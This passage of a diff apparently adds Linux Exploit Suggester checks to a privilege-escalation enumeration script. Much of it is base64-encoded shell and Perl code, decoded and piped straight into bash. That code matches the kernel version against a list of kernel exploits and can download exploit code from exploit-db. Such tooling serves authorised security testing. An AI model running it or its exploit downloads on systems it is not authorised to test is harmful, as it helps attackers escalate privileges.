21tb25seSB1c2VkIHNwZWNpYWwgY2hhcnMKCW5hbWU9JChlY2hvICIkTkFNRSIgfCBjdXQgLWQnICcgLWYgMi0gfCB0ciAtZCAnICgpLycpCgoJYmluX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYmluLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglzcmNfdXJsPSQoZWNobyAiJEVYUCIgfCBncmVwICJzcmMtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCVsgLXogIiRzcmNfdXJsIiBdICYmIFsgLW4gIiRFWFBMT0lUX0RCIiBdICYmIHNyY191cmw9Imh0dHBzOi8vd3d3LmV4cGxvaXQtZGIuY29tL2Rvd25sb2FkLyRFWFBMT0lUX0RCIgoJWyAteiAiJHNyY191cmwiIF0gJiYgWyAteiAiJGJpbl91cmwiIF0gJiYgZXhpdFdpdGhFcnJNc2cgIidzcmMtdXJsJyAvICdiaW4tdXJsJyAvICdleHBsb2l0LWRiJyBlbnRyaWVzIGFyZSBhbGwgZW1wdHkgZm9yICckTkFNRScgZXhwbG9pdCAtIGZpeCB0aGF0LiBBYm9ydGluZy4iCgoJaWYgWyAtbiAiJGFuYWx5c2lzX3VybCIgXTsgdGhlbgogICAgICAgIGRldGFpbHM9IiRhbmFseXNpc191cmwiCgllbGlmICQoZWNobyAiJHNyY191cmwiIHwgZ3JlcCAtcSAnd3d3LmV4cGxvaXQtZGIuY29tJyk7IHRoZW4KICAgICAgICBkZXRhaWxzPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8kRVhQTE9JVF9EQi8iCgllbGlmIFtbICIkc3JjX3VybCIgPX4gXi4qdGd6fHRhci5nenx6aXAkICYmIC1uICIkRVhQTE9JVF9EQiIgXV07IHRoZW4KICAgICAgICBkZXRhaWxzPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8kRVhQTE9JVF9EQi8iCgllbHNlCiAgICAgICAgZGV0YWlscz0iJHNyY191cmwiCglmaQoKCSMgc2tpcCBEb1MgYnkgZGVmYXVsdAoJZG9zPSQoZWNobyAiJEVYUCIgfCBncmVwIC1vIC1pICIoZG9zIikKCVsgIiRvcHRfc2hvd19kb3MiID09ICJmYWxzZSIgXSAmJiBbIC1uICIkZG9zIiBdICYmIGNvbnRpbnVlCgoJIyBoYW5kbGVzIC0tZmV0Y2gtYmluYXJpZXMgb3B0aW9uCglpZiBbICRvcHRfZmV0Y2hfYmlucyA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgZm9yIGkgaW4gJChlY2hvICIkRVhQIiB8IGdyZXAgImJpbi11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKTsgZG8KICAgICAgICAgICAgWyAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIgXSAmJiBybSAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIKICAgICAgICAgICAgd2dldCAtcSAtayAiJGkiIC1PICIke25hbWV9XyQoYmFzZW5hbWUgJGkpIgogICAgICAgIGRvbmUKICAgIGZpCgoJIyBoYW5kbGVzIC0tZmV0Y2gtc291cmNlcyBvcHRpb24KCWlmIFsgJG9wdF9mZXRjaF9zcmNzID0gInRydWUiIF07IHRoZW4KICAgICAgICBbIC1mICIke25hbWV9XyQoYmFzZW5hbWUgJHNyY191cmwpIiBdICYmIHJtIC1mICIke25hbWV9XyQoYmFzZW5hbWUgJHNyY191cmwpIgogICAgICAgIHdnZXQgLXEgLWsgIiRzcmNfdXJsIiAtTyAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIgJgogICAgZmkKCiAgICAjIGRpc3BsYXkgcmVzdWx0IChzaG9ydCkKCWlmIFsgIiRvcHRfc3VtbWFyeSIgPSAidHJ1ZSIgXTsgdGhlbgoJWyAteiAiJHRhZ3MiIF0gJiYgdGFncz0iLSIKCWVjaG8gLWUgIiROQU1FIHx8ICR0YWdzIHx8ICRzcmNfdXJsIgoJY29udGludWUKCWZpCgojIGRpc3BsYXkgcmVzdWx0IChzdGFuZGFyZCkKCWVjaG8gLWUgIlsrXSAkTkFNRSIKCWVjaG8gLWUgIlxuICAgRGV0YWlsczogJGRldGFpbHMiCiAgICAgICAgZWNobyAtZSAiICAgRXhwb3N1cmU6ICQoZGlzcGxheUV4cG9zdXJlICRSQU5LKSIKICAgICAgICBbIC1uICIkdGFncyIgXSAmJiBlY2hvIC1lICIgICBUYWdzOiAkdGFncyIKICAgICAgICBlY2hvIC1lICIgICBEb3dubG9hZCBVUkw6ICRzcmNfdXJsIgogICAgICAgIFsgLW4gIiRleHRfdXJsIiBdICYmIGVjaG8gLWUgIiAgIGV4dC11cmw6ICRleHRfdXJsIgogICAgICAgIFsgLW4gIiRjb21tZW50cyIgXSAmJiBlY2hvIC1lICIgICBDb21tZW50czogJGNvbW1lbnRzIgoKICAgICAgICAjIGhhbmRsZXMgLS1mdWxsIGZpbHRlciBvcHRpb24KICAgICAgICBpZiBbICIkb3B0X2Z1bGwiID0gInRydWUiIF07IHRoZW4KICAgICAgICAgICAgWyAtbiAiJHJlcXMiIF0gJiYgZWNobyAtZSAiICAgUmVxdWlyZW1lbnRzOiAkcmVxcyIKCiAgICAgICAgICAgIFsgLW4gIiRFWFBMT0lUX0RCIiBdICYmIGVjaG8gLWUgIiAgIGV4cGxvaXQtZGI6ICRFWFBMT0lUX0RCIgoKICAgICAgICAgICAgYXV0aG9yPSQoZWNobyAiJEVYUCIgfCBncmVwICJhdXRob3I6ICIgfCBjdXQgLWQnICcgLWYgMi0pCiAgICAgICAgICAgIFsgLW4gIiRhdXRob3IiIF0gJiYgZWNobyAtZSAiICAgYXV0aG9yOiAkYXV0aG9yIgogICAgICAgIGZpCgogICAgICAgIGVjaG8KCmRvbmUK" + if [ "$EXTRA_CHECKS" ]; then + echo $les_b64 | base64 -d | bash -s -- --checksec | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | sed -E "s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g" + else + echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,\[CVE-[0-9]+-[0-9]+\],*,${SED_RED},g" + fi + echo "" +fi + +if [ "$(command -v perl 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester 2" + print_info "https://github.com/jondonas/linux-exploit-suggester-2" + les2_b64="IyEvdXNyL2Jpbi9wZXJsCnVzZSBzdHJpY3Q7CnVzZSB3YXJuaW5nczsKdXNlIEdldG9wdDo6U3RkOwoKb3VyICRWRVJTSU9OID0gJzInOwoKbXkgJW9wdHM7CmdldG9wdHMoICdrOmhkJywgXCVvcHRzICk7CmlmIChleGlzdHMgJG9wdHN7aH0pIHsKICAgIHVzYWdlKCk7CiAgICBleGl0Owp9OwoKcHJpbnRfYmFubmVyKCk7Cm15ICggJGtob3N0LCAkaXNfcGFydGlhbCApID0gZ2V0X2tlcm5lbCgpOwpwcmludCAiICBMb2NhbCBLZXJuZWw6IFxlWzAwOzMzbSRraG9zdFxlWzAwbVxuIjsKCm15ICVleHBsb2l0cyA9IGdldF9leHBsb2l0cygpOwpwcmludCAnICBTZWFyY2hpbmcgJyAuIHNjYWxhciBrZXlzKCVleHBsb2l0cykgLiAiIGV4cGxvaXRzLi4uXG5cbiI7CnByaW50ICIgIFxlWzE7MzVtUG9zc2libGUgRXhwbG9pdHNcZVswMG1cbiI7CgpteSAkY291bnQgPSAxOwpteSBAYXBwbGljYWJsZSA9ICgpOwpFWFBMT0lUOgpmb3JlYWNoIG15ICRrZXkgKCBzb3J0IGtleXMgJWV4cGxvaXRzICkgewogICAgZm9yZWFjaCBteSAka2VybmVsICggQHsgJGV4cGxvaXRzeyRrZXl9e3Z1bG59IH0gKSB7CgogICAgICAgIGlmICggICAgICRraG9zdCBlcSAka2VybmVsCiAgICAgICAgICAgICAgb3IgKCAkaXNfcGFydGlhbCBhbmQgaW5kZXgoJGtlcm5lbCwka2hvc3QpID09IDAgKQogICAgICAgICkgewogICAgICAgICAgICAkZXhwbG9pdHN7JGtleX17a2V5fSA9ICRrZXk7CiAgICAgICAgICAgIHB1c2goQGFwcGxpY2FibGUsICRleHBsb2l0c3ska2V5fSk7CiAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0kY291bnRcZVswMG1cZVswMDszM21dXGVbMDBtICI7CiAgICAgICAgICAgIHByaW50ICJcZVswMDszM20ka2V5XGVbMDBtIjsKICAgICAgICAgICAgcHJpbnQgIiBcZVswMDszM20oJGtlcm5lbClcZVswMG0iIGlmICRpc19wYXJ0aWFsOwoKICAgICAgICAgICAgbXkgJGFsdCA9ICRleHBsb2l0c3ska2V5fXthbHR9OwogICAgICAgICAgICBteSAkY3ZlID0gJGV4cGxvaXRzeyRrZXl9e2N2ZX07CiAgICAgICAgICAgIG15ICRtbHcgPSAkZXhwbG9pdHN7JGtleX17bWlsfTsKICAgICAgICAgICAgaWYgKCAkYWx0IG9yICRjdmUgKSB7CiAgICAgICAgICAgICAgICBwcmludCAiXG4iOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmICggJGFsdCApIHsgcHJpbnQgIiAgICAgIEFsdDogJGFsdCAiOyB9CiAgICAgICAgICAgIGlmICggJGN2ZSApIHsgcHJpbnQgIiAgICAgIENWRS0kY3ZlIjsgfQogICAgICAgICAgICBpZiAoICRtbHcgKSB7IHByaW50ICJcbiAgICAgIFNvdXJjZTogJG1sdyI7IH0KICAgICAgICAgICAgcHJpbnQgIlxuIjsKICAgICAgICAgICAgJGNvdW50ICs9IDE7CiAgICAgICAgICAgIG5leHQgRVhQTE9JVDsKICAgICAgICB9CiAgICB9Cn0KcHJpbnQgIlxuIjsKCmlmICghQGFwcGxpY2FibGUpIHsKICAgIHByaW50ICIgIE5vIGV4cGxvaXRzIGFyZSBhdmFpbGFibGUgZm9yIHRoaXMga2VybmVsIHZlcnNpb25cblxuIjsKICAgIGV4aXQ7Cn0KCmlmIChleGlzdHMgJG9wdHN7ZH0pIHsKICAgIHByaW50ICIgIFxlWzE7MzZtRXhwbG9pdCBEb3dubG9hZFxlWzAwbVxuIjsKICAgIHByaW50ICIgIChEb3dubG9hZCBhbGw6IFxlWzAwOzMzbSdhJ1xlWzAwbSAvIEluZGl2aWR1YWxseTogXGVbMDA7MzNtJzIsNCw1J1xlWzAwbSAiOwogICAgcHJpbnQgIi8gRXhpdDogXGVbMDA7MzNtXmNcZVswMG0pXG4iOwogICAgcHJpbnQgIiAgU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwoKICAgIHdoaWxlICgxKSB7CiAgICAgICAgbXkgJGlucHV0ID0gPFNURElOPjsKICAgICAgICAkaW5wdXQgPX4gcy9ccysvL2c7CgogICAgICAgIGlmICgkaW5wdXQgPX4gL15hJC8pIHsKICAgICAgICAgICAgbXkgQHNlbGVjdGVkID0gKCk7CiAgICAgICAgICAgIGZvciAobXkgJGk9MTsgJGkgPD0gc2NhbGFyIEBhcHBsaWNhYmxlOyAkaSsrKSB7CiAgICAgICAgICAgICAgIHB1c2goQHNlbGVjdGVkLCAkaSk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgbGFzdDsKICAgICAgICB9CiAgICAgICAgZWxzaWYgKCRpbnB1dCA9fiAvXigwfFsxLTldWzAtOV0qKSgsKDB8WzEtOV1bMC05XSopKSokLykgewogICAgICAgICAgICBteSBAc2VsZWN0ZWQgPSB1bmlxKHNwbGl0KCcsJywgJGlucHV0KSk7CiAgICAgICAgICAgIEBzZWxlY3RlZCA9IHNvcnQgeyRhIDw9PiAkYn0gQHNlbGVjdGVkOwogICAgICAgICAgICBpZiAoJHNlbGVjdGVkWzBdID4gMCAmJiAkc2VsZWN0ZWRbLTFdIDw9IHNjYWxhciBAYXBwbGljYWJsZSkgewogICAgICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgICAgIGxhc3Q7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMxbUlucHV0IGlzIG91dCBvZiByYW5nZS5cZVswMG0gU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGVsc2UgewogICAgICAgICAgICBwcmludCAiICBcZVswMDszMW1JbnZhbGlkIGlucHV0LlxlWzAwbSBTZWxlY3QgZXhwbG9pdHMgdG8gZG93bmxvYWQ6ICI7CiAgICAgICAgfQogICAgfQp9OwpleGl0OwoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIyBleHRyYSBmdW5jdGlvbnMgICMjCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnN1YiBnZXRfa2VybmVsIHsKICAgIG15ICRraG9zdCA9ICcnOwoKICAgIGlmICggZXhpc3RzICRvcHRze2t9ICkgewogICAgICAgICRraG9zdCA9ICRvcHRze2t9OwogICAgfQogICAgZWxzZSB7CiAgICAgICAgJGtob3N0ID0gYHVuYW1lIC1yIHxjdXQgLWQiLSIgLWYxYDsKICAgICAgICBjaG9tcCAka2hvc3Q7CiAgICB9CgogICAgaWYgKCFkZWZpbmVkICRraG9zdCB8fCAhKCRraG9zdCA9fiAvXlswLTldKyhbLl1bMC05XSspKiQvKSkgewogICAgICAgIHByaW50ICIgIFxlWzAwOzMxbVNwZWNpZmllZCBrZXJuZWwgaXMgaW4gdGhlIHdyb25nIGZvcm1hdFxlWzAwbVxuIjsKICAgICAgICBwcmludCAiICBUcnkgYSBrZXJuZWwgZm9ybWF0IGxpa2UgdGhpczogMy4yLjBcblxuIjsKICAgICAgICBleGl0OwogICAgfQoKICAgICMgcGFydGlhbCBrZXJuZWxzIG1pZ2h0IGJlIHByb3ZpZGVkIGJ5IHRoZSB1c2VyLAogICAgIyBzdWNoIGFzICcyLjQnIG9yICcyLjYuJwogICAgbXkgJGlzX3BhcnRpYWwgPSAka2hvc3QgPX4gL15cZCtcLlxkK1wuXGQ/LyA/IDAgOiAxOwogICAgcmV0dXJuICggJGtob3N0LCAkaXNfcGFydGlhbCApOwp9CgpzdWIgZG93bmxvYWRfZXhwbG9pdHMgewogICAgbXkgKCRzcmVmLCAkYXJlZikgPSBAXzsKICAgIG15IEBzZWxlY3RlZCA9IEB7ICRzcmVmIH07CiAgICBteSBAYXBwbGljYWJsZSA9IEB7ICRhcmVmIH07CiAgICBteSAkZXhwbG9pdF9iYXNlID0gInd3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cyI7CiAgICBteSAkZG93bmxvYWRfYmFzZSA9ICJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9yYXcvIjsKICAgIHByaW50ICJcbiI7CgogICAgZm9yZWFjaCBteSAkbnVtIChAc2VsZWN0ZWQpIHsKICAgICAgICBteSAkbWlsID0gJGFwcGxpY2FibGVbJG51bS0xXXttaWx9OwogICAgICAgIG5leHQgaWYgKCFkZWZpbmVkICRtaWwpOwogICAgICAgIG15ICgkZXhwbG9pdF9udW0pID0gKCRtaWwgPX4gL14uKlwvKFsxLTldWzAtOV0qKVwvPyQvKTsKICAgICAgICAKICAgICAgICBpZiAoJGV4cGxvaXRfbnVtICYmIGluZGV4KCRtaWwsICRleHBsb2l0X2Jhc2UpICE9IC0xKSB7CiAgICAgICAgICAgIG15ICR1cmwgPSAkZG93bmxvYWRfYmFzZSAuICRleHBsb2l0X251bTsKICAgICAgICAgICAgbXkgJGZpbGUgPSAiZXhwbG9pdF8kYXBwbGljYWJsZVskbnVtLTFde2tleX0iOwogICAgICAgICAgICBwcmludCAiICBEb3dubG9hZGluZyBcZVswMDszM20kdXJsXGVbMDBtIC0+IFxlWzAwOzMzbSRmaWxlXGVbMDBtXG4iOwogICAgICAgICAgICBzeXN0ZW0gIndnZXQgJHVybCAtTyAkZmlsZSA+IC9kZXYvbnVsbCAyPiYxIjsKICAgICAgICB9CiAgICAgICAgZWxzZSB7CiAgICAgICAgICAgIHByaW50ICIgIE5vIGV4cGxvaXQgY29kZSBhdmFpbGFibGUgZm9yIFxlWzAwOzMzbSRhcHBsaWNhYmxlWyRudW0tMV17a2V5fVxlWzAwbVxuIjsgCiAgICAgICAgfQogICAgfQogICAgcHJpbnQgIlxuIjsKfQoKc3ViIHVuaXEgewogICAgbXkgJXNlZW47CiAgICBncmVwICEkc2VlbnskX30rKywgQF87Cn0KCnN1YiB1c2FnZSB7CnByaW50X2Jhbm5lcigpOwpwcmludCAiICBcZVswMDszNW1Vc2FnZTpcZVswMG0gJDAgWy1oXSBbLWsga2VybmVsXSBbLWRdXG5cbiI7CnByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0taFxlWzAwbVxlWzAwOzMzbV1cZVswMG0gSGVscCAodGhpcyBtZXNzYWdlKVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1rXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBLZXJuZWwgbnVtYmVyIChlZy4gMi42LjI4KVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1kXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudVxuXG4iOwoKcHJpbnQgIiAgWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KVxuIjsKcHJpbnQgIiAgdG8gc2VlIGFsbCBleHBsb2l0cyBhdmFpbGFibGUuXG5cbiI7Cn0KCnN1YiBwcmludF9iYW5uZXIgewpwcmludCAiXG5cZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG4iOwpwcmludCAiXGVbMTszMW0gICAgTGludXggRXhwbG9pdCBTdWdnZXN0ZXIgJFZFUlNJT05cZVswMG1cbiI7CnByaW50ICJcZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG5cbiI7Cn0KCnN1YiBnZXRfZXhwbG9pdHMgewogIHJldHVybiAoCiAgICAndzAwdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xNicsICcyLjQuMTcnLCAnMi40LjE4JywKICAgICAgICAgICAgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywKICAgICAgICBdCiAgICB9LAogICAgJ2JyaycgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjEwJywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsICcyLjQuMjInIF0sCiAgICB9LAogICAgJ2F2ZScgPT4geyB2dWxuID0+IFsgJzIuNC4xOScsICcyLjQuMjAnIF0gfSwKCiAgICAnZWxmbGJsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNC4yOSddLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNzQ0JywKICAgIH0sCgogICAgJ2VsZmR1bXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40LjI3J10gfSwKICAgICdlbGZjZCcgICAgICAgID0+IHsgdnVsbiA9PiBbJzIuNi4xMiddIH0sCiAgICAnZXhwYW5kX3N0YWNrJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAoKICAgICdoMDBseXNoaXQnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsCiAgICAgICAgICAgICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDA2LTM2MjYnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDEzJywKICAgIH0sCgogICAgJ2tkdW1wJyA9PiB7IHZ1bG4gPT4gWycyLjYuMTMnXSB9LAogICAgJ2ttMicgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4yMicgXSB9LAogICAgJ2tyYWQnID0+CiAgICAgIHsgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdIH0sCgogICAgJ2tyYWQzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL2V4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEzOTcnLAogICAgfSwKCiAgICAnbG9jYWwyNicgPT4geyB2dWxuID0+IFsnMi42LjEzJ10gfSwKICAgICdsb2tvJyAgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnIF0gfSwKCiAgICAnbXJlbWFwX3B0ZScgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjIwJywgJzIuMi4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTYwJywKICAgIH0sCgogICAgJ25ld2xvY2FsJyA9PiB7IHZ1bG4gPT4gWyAnMi40LjE3JywgJzIuNC4xOScgXSB9LAogICAgJ29uZ19iYWsnICA9PiB7IHZ1bG4gPT4gWycyLjYuNSddIH0sCiAgICAncHRyYWNlJyA9PgogICAgICB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywgJzIuNC4yMicgXSB9LAogICAgJ3B0cmFjZV9rbW9kJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLCAnMi40LjIyJyBdLAogICAgICAgIGN2ZSAgPT4gJzIwMDctNDU3MycsCiAgICB9LAogICAgJ3B0cmFjZV9rbW9kMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsICcyLjYuMzEnLAogICAgICAgICAgICAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdpYTMyc3lzY2FsbCxyb2JlcnRfeW91X3N1Y2snLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTAyMycsCiAgICAgICAgY3ZlID0+ICcyMDEwLTMzMDEnLAogICAgfSwKICAgICdwdHJhY2UyNCcgPT4geyB2dWxuID0+IFsnMi40LjknXSB9LAogICAgJ3B3bmVkJyAgICA9PiB7IHZ1bG4gPT4gWycyLjYuMTEnXSB9LAogICAgJ3B5MicgICAgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjE3JywgJzIuNi4xNScsICcyLjYuMTMnIF0gfSwKICAgICdyYXB0b3JfcHJjdGwnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnIF0sCiAgICAgICAgY3ZlICA9PiAnMjAwNi0yNDUxJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMjAzMScsCiAgICB9LAogICAgJ3ByY3RsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA0JywKICAgIH0sCiAgICAncHJjdGwyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA1JywKICAgIH0sCiAgICAncHJjdGwzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA2JywKICAgIH0sCiAgICAncHJjdGw0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDExJywKICAgIH0sCiAgICAncmVtYXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40J10gfSwKICAgICdyaXAnICAgICAgICA9PiB7IHZ1bG4gPT4gWycyLjInXSB9LAogICAgJ3N0YWNrZ3JvdzInID0+IHsgdnVsbiA9PiBbICcyLjQuMjknLCAnMi42LjEwJyBdIH0sCiAgICAndXNlbGliMjQnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMCcsICcyLjQuMTcnLCAnMi40LjIyJywgJzIuNC4yNScsICcyLjQuMjcnLCAnMi40LjI5JyBdCiAgICB9LAogICAgJ25ld3NtcCcgICA9PiB7IHZ1bG4gPT4gWycyLjYnXSB9LAogICAgJ3NtcHJhY2VyJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAogICAgJ2xvZ2lueCcgICA9PiB7IHZ1bG4gPT4gWycyLjQuMjInXSB9LAogICAgJ2V4cC5zaCcgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjEwJywgJzIuNi4xNicsICcyLjYuMTMnIF0gfSwKICAgICd2bXNwbGljZTEnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICAgICAgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI0LjEnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdqZXNzaWNhIGJpZWwnLAogICAgICAgIGN2ZSA9PiAnMjAwOC0wNjAwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MicsCiAgICB9LAogICAgJ3Ztc3BsaWNlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjIzJywgJzIuNi4yNCcgXSwKICAgICAgICBhbHQgID0+ICdkaWFuZV9sYW5lJywKICAgICAgICBjdmUgID0+ICcyMDA4LTA2MDAnLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MycsCiAgICB9LAogICAgJ3Zjb25zb2xlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNiddLAogICAgICAgIGN2ZSAgPT4gJzIwMDktMTA0NicsCiAgICB9LAogICAgJ3NjdHAnID0+IHsKICAgICAgICB2dWxuID0+IFsnMi42LjI2J10sCiAgICAgICAgY3ZlICA9PiAnMjAwOC00MTEzJywKICAgIH0sCiAgICAnZnRyZXgnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAwOC00MjEwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNjg1MScsCiAgICB9LAogICAgJ2V4aXRfbm90aWZ5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy84MzY5JywKICAgIH0sCiAgICAndWRldicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScgXSwKICAgICAgICBhbHQgID0+ICd1ZGV2IDwxLjQuMScsCiAgICAgICAgY3ZlICA9PiAnMjAwOS0xMTg1J